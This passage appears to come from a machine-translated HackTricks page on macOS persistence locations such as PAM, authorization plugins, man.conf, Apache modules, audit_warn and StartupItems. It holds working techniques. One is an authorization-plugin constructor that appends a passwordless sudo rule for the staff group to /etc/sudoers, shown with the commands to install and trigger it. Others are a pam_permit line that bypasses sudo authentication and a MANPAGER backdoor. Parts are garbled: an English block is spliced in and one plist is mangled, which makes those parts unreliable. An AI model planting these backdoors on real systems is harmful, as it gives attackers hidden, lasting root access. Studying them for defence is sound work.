यदि आप `/etc/daily.local`, `/etc/weekly.local` या `/etc/monthly.local` फ़ाइलों में से किसी भी फ़ाइल को लिखने में कामयाब होते हैं तो यह **जल्दी या धीरे से क्रियान्वित होगा**।
{% hint style="warning" %}
ध्यान दें कि आवधिक स्क्रिप्ट **स्क्रिप्ट के मालिक के रूप में क्रियान्वित किया जाएगा**। इसलिए यदि एक सामान्य उपयोगकर्ता स्क्रिप्ट का मालिक है, तो यह उस उपयोगकर्ता के रूप में क्रियान्वित किया जाएगा (यह विशेषाधिकार उन्नति हमलों को रोक सकता है)।
{% endhint %}
### PAM
Writeup: [Linux Hacktricks PAM](../linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md)\
Writeup: [https://theevilbit.github.io/beyond/beyond\_0005/](https://theevilbit.github.io/beyond/beyond\_0005/)
* बॉक्स सैंडबॉक्स को छलने के लिए उपयोगी: [🟠](https://emojipedia.org/large-orange-circle)
* लेकिन आपको रूट होना चाहिए
* TCC बाईपास: [🔴](https://emojipedia.org/large-red-circle)
#### स्थान
* रूट हमेशा आवश्यक है
#### विवरण और उत्पीड़न
PAM अधिक **स्थायित्व** और मैलवेयर पर ध्यान केंद्रित है जो macOS में आसान निष्पादन पर है, इस ब्लॉग में इस तकनीक को बेहतर समझने के लिए विस्तृत व्याख्या नहीं दी जाएगी, **लेखन को समझने के लिए लेखन पढ़ें**।
PAM मॉड्यूल्स की जांच करें:
```bash
ls -l /etc/pam.d
```
### macOS Auto Start Locations
#### Launch Agents
Launch Agents are used to run code at login or when a user logs in. They are stored in the following locations:
- **Global Launch Agents**: `/Library/LaunchAgents`
- **Per-User Launch Agents**: `~/Library/LaunchAgents`
#### Launch Daemons
Launch Daemons are used to run code at boot or when a system starts up. They are stored in the following locations:
- **Global Launch Daemons**: `/Library/LaunchDaemons`
- **Per-User Launch Daemons**: Not applicable
#### Startup Items
Startup Items are deprecated and no longer used in macOS.
```bash
auth sufficient pam_permit.so
```
इसका **रूप ऐसा होगा** कुछ इस प्रकार:
```bash
# sudo: auth account password session
auth sufficient pam_permit.so
auth include sudo_local
auth sufficient pam_smartcard.so
auth required pam_opendirectory.so
account required pam_permit.so
password required pam_deny.so
session required pam_permit.so
```
और इसलिए **`sudo` का उपयोग करने का प्रयास** किया जाएगा।
{% hint style="danger" %}
ध्यान दें कि यह निर्देशिका TCC द्वारा संरक्षित है, इसलिए उपयोगकर्ता को पहुंच के लिए पूछा जाएगा।
{% endhint %}
### अधिकृति प्लगइन
लेख: [https://theevilbit.github.io/beyond/beyond\_0028/](https://theevilbit.github.io/beyond/beyond\_0028/)\
लेख: [https://posts.specterops.io/persistent-credential-theft-with-authorization-plugins-d17b34719d65](https://posts.specterops.io/persistent-credential-theft-with-authorization-plugins-d17b34719d65)
* सैंडबॉक्स को छलने के लिए उपयोगी: [🟠](https://emojipedia.org/large-orange-circle)
* लेकिन आपको रूट होना चाहिए और अतिरिक्त कॉन्फ़िगरेशन करनी होगी
* TCC बायपास: ???
#### स्थान
* `/Library/Security/SecurityAgentPlugins/`
* रूट की आवश्यकता है
* इसे प्लगइन का उपयोग करने के लिए अधिकृति डेटाबेस कॉन्फ़िगर करने की भी आवश्यकता है
#### विवरण और शोषण
आप एक अधिकृति प्लगइन बना सकते हैं जो एक उपयोगकर्ता लॉग-इन करते समय निष्क्रिय किया जाएगा। इन प्लगइन्स में से एक बनाने के बारे में अधिक जानकारी के लिए पिछले लेखों की जाँच करें (और सावधान रहें, एक खराब लिखा हुआ प्लगइन आपको बाहर लॉक कर सकता है और आपको अपने मैक को पुनर्प्राप्ति मोड से साफ करने की आवश्यकता होगी)।
```objectivec
// Compile the code and create a real bundle
// gcc -bundle -framework Foundation main.m -o CustomAuth
// mkdir -p CustomAuth.bundle/Contents/MacOS
// mv CustomAuth CustomAuth.bundle/Contents/MacOS/
#import
__attribute__((constructor)) static void run()
{
NSLog(@"%@", @"[+] Custom Authorization Plugin was loaded");
system("echo \"%staff ALL=(ALL) NOPASSWD:ALL\" >> /etc/sudoers");
}
```
**बंडल** को लोड होने वाले स्थान पर **मूव** करें:
```bash
cp -r CustomAuth.bundle /Library/Security/SecurityAgentPlugins/
```
**नियम** जोड़ने के लिए इस प्लगइन को लोड करें:
```bash
cat > /tmp/rule.plist <classevaluate-mechanismsmechanismsCustomAuth:login,privileged
EOF
security authorizationdb write com.asdf.asdf < /tmp/rule.plist
```
**`evaluate-mechanisms`** अधिकृति फ्रेमवर्क को बताएगा कि इसे **अधिकृति के लिए बाह्य तंत्र को कॉल करने की आवश्यकता होगी**। इसके अतिरिक्त, **`privileged`** इसे रूट द्वारा निष्पादित करने के लिए करेगा।
इसे ट्रिगर करें:
```bash
security authorize com.asdf.asdf
```
और फिर **कर्मचारी समूह को सुडो एक्सेस** होना चाहिए (पढ़ें `/etc/sudoers` को कन्फर्म करने के लिए)।
### Man.conf
Writeup: [https://theevilbit.github.io/beyond/beyond\_0030/](https://theevilbit.github.io/beyond/beyond\_0030/)
* सैंडबॉक्स को बाईपास करने के लिए उपयोगी: [🟠](https://emojipedia.org/large-orange-circle)
* लेकिन आपको रूट होना चाहिए और उपयोगकर्ता को man का उपयोग करना चाहिए
* TCC बाईपास: [🔴](https://emojipedia.org/large-red-circle)
#### स्थान
* **`/private/etc/man.conf`**
* रूट की आवश्यकता है
* **`/private/etc/man.conf`**: जबकि man का उपयोग किया जाता है
#### विवरण और एक्सप्लॉइट
कॉन्फ़िग फ़ाइल **`/private/etc/man.conf`** इसका संकेत देती है कि मैन दस्तावेज़ फ़ाइलें खोलने के लिए कौन सा बाइनरी/स्क्रिप्ट उपयोग करना है। इसलिए, एक्सीक्यूटेबल का पथ संशोधित किया जा सकता है ताकि हर बार जब उपयोगकर्ता किसी डॉक्स पढ़ने के लिए man का उपयोग करता है, एक बैकडोर निष्पादित हो।
उदाहरण के लिए **`/private/etc/man.conf`** में सेट करें:
```
MANPAGER /tmp/view
```
और फिर `/tmp/view` को इस प्रकार बनाएं:
```bash
#!/bin/zsh
touch /tmp/manconf
/usr/bin/less -s
```
### Apache2
**लेख**: [https://theevilbit.github.io/beyond/beyond\_0023/](https://theevilbit.github.io/beyond/beyond\_0023/)
* सैंडबॉक्स को बाईपास करने के लिए उपयोगी: [🟠](https://emojipedia.org/large-orange-circle)
* लेकिन आपको रूट होना चाहिए और एपाचे को चलाया जाना चाहिए
* TCC बाईपास: [🔴](https://emojipedia.org/large-red-circle)
* Httpd के entitlements नहीं हैं
#### स्थान
* **`/etc/apache2/httpd.conf`**
* रूट की आवश्यकता
* ट्रिगर: जब Apache2 शुरू होता है
#### विवरण और उत्पीड़न
आप `/etc/apache2/httpd.conf` में इंडिकेट कर सकते हैं कि एक मॉड्यूल लोड करने के लिए एक लाइन जोड़ें जैसे:
```bash
LoadModule my_custom_module /Users/Shared/example.dylib "My Signature Authority"
```
{% endcode %}
इस तरह आपके संकलित मॉड्यूल Apache द्वारा लोड किए जाएंगे। एकमात्र बात यह है कि आपको इसे **एक मान्य Apple प्रमाणपत्र के साथ साइन करने** की आवश्यकता है, या फिर आपको सिस्टम में एक नया विश्वसनीय प्रमाणपत्र **जोड़ने** और उसके साथ **साइन करने** की आवश्यकता है।
फिर, यदि आवश्यक हो, सर्वर को शुरू होने की सुनिश्चित करने के लिए आपको निम्नलिखित को निष्पादित करना होगा:
```bash
sudo launchctl load -w /System/Library/LaunchDaemons/org.apache.httpd.plist
```
डायनामिक लोडेड बाइनरी (Dylib) के लिए कोड उदाहरण:
```objectivec
#include
#include
__attribute__((constructor))
static void myconstructor(int argc, const char **argv)
{
printf("[+] dylib constructor called from %s\n", argv[0]);
syslog(LOG_ERR, "[+] dylib constructor called from %s\n", argv[0]);
}
```
### BSM ऑडिट फ्रेमवर्क
लेख: [https://theevilbit.github.io/beyond/beyond\_0031/](https://theevilbit.github.io/beyond/beyond\_0031/)
* सैंडबॉक्स को बाईपास करने के लिए उपयोगी: [🟠](https://emojipedia.org/large-orange-circle)
* लेकिन आपको रूट होना चाहिए, auditd चल रहा होना चाहिए और चेतावनी का कारण होना चाहिए
* TCC बाईपास: [🔴](https://emojipedia.org/large-red-circle)
#### स्थान
* **`/etc/security/audit_warn`**
* रूट की आवश्यकता
* **ट्रिगर**: जब auditd एक चेतावनी का पता लगाता है
#### विवरण और उत्पीड़न
जबकि auditd एक चेतावनी का पता लगाता है, तो स्क्रिप्ट **`/etc/security/audit_warn`** **निष्पादित** होती है। इसलिए आप इस पर अपने पेलोड जोड़ सकते हैं।
```bash
echo "touch /tmp/auditd_warn" >> /etc/security/audit_warn
```
### स्टार्टअप आइटम्स
{% hint style="danger" %}
**यह पुराना हो गया है, इसलिए इन निर्देशिकाओं में कुछ नहीं मिलना चाहिए।**
{% endhint %}
**StartupItem** एक निर्दिष्ट डायरेक्टरी है जो या तो `/Library/StartupItems/` या `/System/Library/StartupItems/` के भीतर स्थित होना चाहिए। एक बार यह डायरेक्टरी स्थापित होती है, तो इसमें दो विशिष्ट फ़ाइलें होनी चाहिए:
1. एक **rc स्क्रिप्ट**: स्टार्टअप पर निष्पादित एक शैल स्क्रिप्ट।
2. एक **plist फ़ाइल**, विशेष रूप से `StartupParameters.plist` नामक, जिसमें विभिन्न कॉन्फ़िगरेशन सेटिंग्स होती हैं।
सुनिश्चित करें कि एरसी स्क्रिप्ट और `StartupParameters.plist` फ़ाइल दोनों सही ढंग से **StartupItem** डायरेक्टरी के भीतर स्थापित हैं ताकि स्टार्टअप प्रक्रिया उन्हें पहचान और उपयोग कर सके।
{% tabs %}
{% tab title="StartupParameters.plist" %}
```xml
DescriptionThis is a description of this serviceOrderPreferenceNoneProvidessuperservicename
```
{% endtab %}
{% tab title="superservicename" %}सुपर सेवा नाम{% endtab %}
```bash
#!/bin/sh
. /etc/rc.common
StartService(){
touch /tmp/superservicestarted
}
StopService(){
rm /tmp/superservicestarted
}
RestartService(){
echo "Restarting"
}
RunService "$1"
```
{% endtab %}
{% endtabs %}
### ~~emond~~
{% hint style="danger" %}
मैं अपने macOS में इस कॉम्पोनेंट को नहीं ढूंढ पा रहा हूँ, इसके बारे में अधिक जानकारी के लिए व्रिटअप देखें
{% endhint %}
Writeup: [https://theevilbit.github.io/beyond/beyond\_0023/](https://theevilbit.github.io/beyond/beyond\_0023/)
Apple द्वारा पेश किया गया, **emond** एक लॉगिंग मेकेनिज़्म है जो अविकसित या संभावित तौर पर छोड़ दिया गया लगता है, फिर भी यह उपलब्ध है। एक Mac प्रशासक के लिए विशेष रूप से फायदेमंद नहीं होता है, यह अप्रसिद्ध सेवा खतरे के कारकों के लिए एक सूक्ष्म स्थिरता विधि के रूप में काम कर सकती है, जिसे अधिकांश macOS प्रशासक शायद न देखें।
इसके अस्तित्व के जानकार लोगों के लिए **emond** का किसी भी दुरुपयोग की पहचान सरल है। इस सेवा के लिए सिस्टम का लॉन्चडेमन स्क्रिप्ट को एक ही निर्देशिका में निष्पादित करने की तलाश में होता है। इसे जांचने के लिए, निम्नलिखित कमांड का उपयोग किया जा सकता है:
```bash
ls -l /private/var/db/emondClients
```
### ~~XQuartz~~
Writeup: [https://theevilbit.github.io/beyond/beyond\_0018/](https://theevilbit.github.io/beyond/beyond\_0018/)
#### स्थान
* **`/opt/X11/etc/X11/xinit/privileged_startx.d`**
* रूट की आवश्यकता है
* **ट्रिगर**: XQuartz के साथ
#### विवरण और शोषण
XQuartz **अब macOS में स्थापित नहीं है**, इसलिए अधिक जानकारी के लिए व्रिटअप देखें.
### ~~kext~~
{% hint style="danger" %}
केक्स्ट स्थापित करना इतना जटिल है कि मैं इसे सैंडबॉक्स से बाहर निकलने या स्थिरता के लिए नहीं मानता (जब तक आपके पास कोई शोषण नहीं है)
{% endhint %}
#### स्थान
केक्स्ट को स्टार्टअप आइटम के रूप में स्थापित करने के लिए, इसे निम्नलिखित स्थानों में स्थापित किया जाना चाहिए:
* `/System/Library/Extensions`
* ओएस एक्स ऑपरेटिंग सिस्टम में बिल्ट इन केक्स्ट फ़ाइलें।
* `/Library/Extensions`
* तृतीय पक्ष सॉफ़्टवेयर द्वारा स्थापित केक्स्ट फ़ाइलें
आप वर्तमान में लोड केक्स्ट फ़ाइलें की सूची बना सकते हैं:
```bash
kextstat #List loaded kext
kextload /path/to/kext.kext #Load a new one based on path
kextload -b com.apple.driver.ExampleBundle #Load a new one based on path
kextunload /path/to/kext.kext
kextunload -b com.apple.driver.ExampleBundle
```
### ~~amstoold~~
लेख: [https://theevilbit.github.io/beyond/beyond\_0029/](https://theevilbit.github.io/beyond/beyond\_0029/)
#### स्थान
* **`/usr/local/bin/amstoold`**
* रूट की आवश्यकता है
#### विवरण और शोषण
जैसा कि प्रतीत होता है, `/System/Library/LaunchAgents/com.apple.amstoold.plist` से `plist` इस बाइनरी का उपयोग कर रहा था जबकि एक XPC सेवा को उजागर कर रहा था... बात यह है कि बाइनरी मौजूद नहीं थी, इसलिए आप कुछ वहाँ रख सकते थे और जब XPC सेवा को कॉल किया जाता है तो आपकी बाइनरी को कॉल किया जाएगा।
मुझे अब अपने macOS में इसे नहीं मिला।
### ~~xsanctl~~
लेख: [https://theevilbit.github.io/beyond/beyond\_0015/](https://theevilbit.github.io/beyond/beyond\_0015/)
#### स्थान
* **`/Library/Preferences/Xsan/.xsanrc`**
* रूट की आवश्यकता है
* **ट्रिगर**: जब सेवा चलाई जाती है (कम)
#### विवरण और शोषण
ऐसा लगता है कि इस स्क्रिप्ट को चलाना बहुत आम नहीं है और मुझे अपने macOS में यह भी नहीं मिला, इसलिए अगर आप अधिक जानकारी चाहते हैं तो लेख की जाँच करें।
### ~~/etc/rc.common~~
{% hint style="danger" %}
**यह आधुनिक MacOS संस्करणों में काम नहीं कर रहा है**
{% endhint %}
यहाँ **ऐसे कमांड रखना संभव है जो स्टार्टअप पर निष्पादित किए जाएंगे।** साधारण rc.common स्क्रिप्ट का उदाहरण:
```bash
#
# Common setup for startup scripts.
#
# Copyright 1998-2002 Apple Computer, Inc.
#
######################
# Configure the shell #
######################
#
# Be strict
#
#set -e
set -u
#
# Set command search path
#
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/libexec:/System/Library/CoreServices; export PATH
#
# Set the terminal mode
#
#if [ -x /usr/bin/tset ] && [ -f /usr/share/misc/termcap ]; then
# TERM=$(tset - -Q); export TERM
#fi
###################
# Useful functions #
###################
#
# Determine if the network is up by looking for any non-loopback
# internet network interfaces.
#
CheckForNetwork()
{
local test
if [ -z "${NETWORKUP:=}" ]; then
test=$(ifconfig -a inet 2>/dev/null | sed -n -e '/127.0.0.1/d' -e '/0.0.0.0/d' -e '/inet/p' | wc -l)
if [ "${test}" -gt 0 ]; then
NETWORKUP="-YES-"
else
NETWORKUP="-NO-"
fi
fi
}
alias ConsoleMessage=echo
#
# Process management
#
GetPID ()
{
local program="$1"
local pidfile="${PIDFILE:=/var/run/${program}.pid}"
local pid=""
if [ -f "${pidfile}" ]; then
pid=$(head -1 "${pidfile}")
if ! kill -0 "${pid}" 2> /dev/null; then
echo "Bad pid file $pidfile; deleting."
pid=""
rm -f "${pidfile}"
fi
fi
if [ -n "${pid}" ]; then
echo "${pid}"
return 0
else
return 1
fi
}
#
# Generic action handler
#
RunService ()
{
case $1 in
start ) StartService ;;
stop ) StopService ;;
restart) RestartService ;;
* ) echo "$0: unknown argument: $1";;
esac
}
```
## Persistence techniques and tools
* [https://github.com/cedowens/Persistent-Swift](https://github.com/cedowens/Persistent-Swift)
* [https://github.com/D00MFist/PersistentJXA](https://github.com/D00MFist/PersistentJXA)
जानें AWS हैकिंग को शून्य से हीरो तकhtARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.